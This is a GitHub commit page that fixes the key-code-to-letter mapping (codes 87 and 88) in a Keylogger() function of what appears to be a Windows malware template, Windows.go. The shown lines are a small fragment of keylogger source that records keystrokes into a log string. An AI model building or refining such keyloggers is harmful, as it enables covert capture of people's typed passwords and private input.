Skip to content

Commit

Permalink
Update Windows.go
Browse files Browse the repository at this point in the history
Fix keylogger key
  • Loading branch information
tiagorlampert committed Mar 29, 2019
1 parent 1d482f8 commit cd3b2cd
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions src/template/Windows.go
Expand Up @@ -394,9 +394,9 @@ func Keylogger() {
case 86:
Logs += "V"
case 87:
Logs += "X"
Logs += "W"
case 88:
Logs += "Z"
Logs += "X"
case 89:
Logs += "Y"
case 90:
Expand Down

0 comments on commit cd3b2cd

Please sign in to comment.